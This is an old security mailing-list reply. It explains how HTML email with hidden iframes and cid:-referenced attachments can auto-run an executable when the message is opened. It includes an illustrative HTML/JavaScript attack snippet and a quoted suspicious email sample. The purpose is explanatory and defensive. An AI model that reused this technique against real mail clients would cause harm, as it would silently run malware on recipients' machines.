-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Roberto,

Hi!

A script can call an attached executable automatically by just
opening the email, not the attachment itself. This poses a security
risk. An example of such a script:

< img SRC="cid:mr.malware.to.you"; style="display:none">
< img id=W0W src="cid:malware.com"; style="display:none">< BR><
center>< h6>YOU!DORA< /h6>< /center>
< IFRAME id=malware width=10 height=10 style="display:none" ><
/IFRAME>

< script>
// 18.03.01 http://www.malware.com
malware.location.href=W0W.src
< /script

where the first image is the executable. The second image is composed
of simple JavaScripting and ActiveX control.

What happens is, once the mail message is opened, the two 'embedded'
images are instantly transferred to the 'embedded' folder. Then, the
simple JavaScript: location.href automatically calls the second image
composed of another JavaScript and ActiveX control. Though out of
sight in the iframe, when these are triggered, the *.exe is run.

The *.exe and JavaScript and ActiveX control reside in the same
folder [the so-called "embedded' folder], these are also
automatically called to the iframe.

- -Leo Martinez

- -----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 29, 2002 10:02 AM
To: [EMAIL PROTECTED]
Subject: Weird HTML email


I have been getting HTML email from different folks on one of my
account.
They all are similar to the HTML below. Can someone tell me what this
email
is all about? Does it pose a security threat?

- -Roberto Cahanap


<HTML><HEAD></HEAD><BODY>
<iframe src=cid:S2oyJYo06RO0 height=0 width=0>
</iframe>
<FONT></FONT></BODY></HTML>

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPPXUGwYiKlr97dJ+EQJ4ogCfbxE02V2Qe4Zjz6DSIMxh3qVybA0AnRnR
+6y28kpNz6Xs4wsS8i1x5tGd
=XZid
-----END PGP SIGNATURE-----

Reply via email to